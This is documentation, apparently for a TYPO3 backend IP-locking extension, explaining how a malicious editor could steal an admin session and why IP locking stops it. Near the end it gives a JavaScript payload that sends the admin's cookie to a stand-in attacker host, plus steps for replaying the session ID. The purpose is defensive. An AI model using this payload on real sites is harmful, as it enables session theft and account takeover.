BE user IP locking¶

Potential security risk in TYPO3?¶

No, but maybe yes.

You are the only one who have backend access?Then, no!

Editors (non admins) have access to the backend and you trust them in a way that they are not willing to break the site?Then, no!

You have a bunch of editors in the backend and you can't trust them for some reason and maybe one of them loves to break the site or likes to get adminrights?

Then yes, there's a potential security risk!

How does an attack work?¶

The attacker must have at least editor rights to include malicious JavaScript code into one page which can be done via the HTML content type for example. Then the administrator has to be logged in and has to visit that page to trigger the attack, since this code is harder to insert in backend pages. If that occurs the attacker can get admin access to the backend.

To summarize that:

• the attacker must have at least backend editor rights to put in malicious JavaScript code
• the admin has to be logged in
• the admin has to view the manipulated frontend page
• the attacker has to wait for that moment to get the admin's cookie and therefore admin access

How does this extension protect from cross site scripting attacks?¶

Even if the attacker manages to get the admin's cookie he can't access the backend as the admin user because his IP address is different from the one the admin logged in with.

Therefore IP locking gives me totally safeness?¶

No. There's still a way for the attacker to bypass the IP check. This can be done by IP spoofing. IP spoofing means the attacker is able to simulate the admins IP.

But this is only possible in some circumstances (intranet) and it's also not easy to do. But to protect from IP spoofing is not something TYPO3 or any other application have to deal with, that has to be done on the low level of the network infrastructure.

Another thing might be that a bunch of users log in with the same IP address. For example all your intranet users use the same IP for outgoing connections to the Internet. In that case the IP locking is not helping. But it might help to have employees who love their job.

What are the drawbacks of IP locking?¶

During a backend session (You're logged in) it might be possible that your IP changes. For example it's very common that your DSL provider might disconnect your line once a day. Then you will probably get a new IP address. In that case you have to re logininto TYPO3.

The attacker has to ...¶

Login to TYPO3, on some page create a new content element of the type HTML. You see the attacker already needs backend access and editor rights.

Insert the following code into the new content element:

<script language="JavaScript1.1">
document.write ("<iframe
src='http://attackers.host.name/cookie-logger.php?"+document.cookie+"' width=300 height=300>
I am a bad guy</iframe>");
</script>

Another user (admin) has to ...¶

View the page content just created by using the VIEW module (e. g.view it in the same window you used for login to TYPO3). This transfers the admin'ssession cookie to the cookie-logger.php script by using JavaScript.

The attacker ...¶

The script cookie-logger.php creates a logfilecontaining the cookie information which identifies your login.Open that logfile and copy the BE user session id.

Open a new browser window / new browser / let someone else open a new browser window and call this script: http://attackers.host.name/remotelogin.php?cookie=THEBESESSIONIDOf course you have to replace THEBESESSIONID with the copied id and modify the remotelogin.php to point to the victims website.

The attacker is logged in as the victim's user.

Install this extension and let the remote user remote-login again (or redial the connection in order to get a new IP address).The attack fails.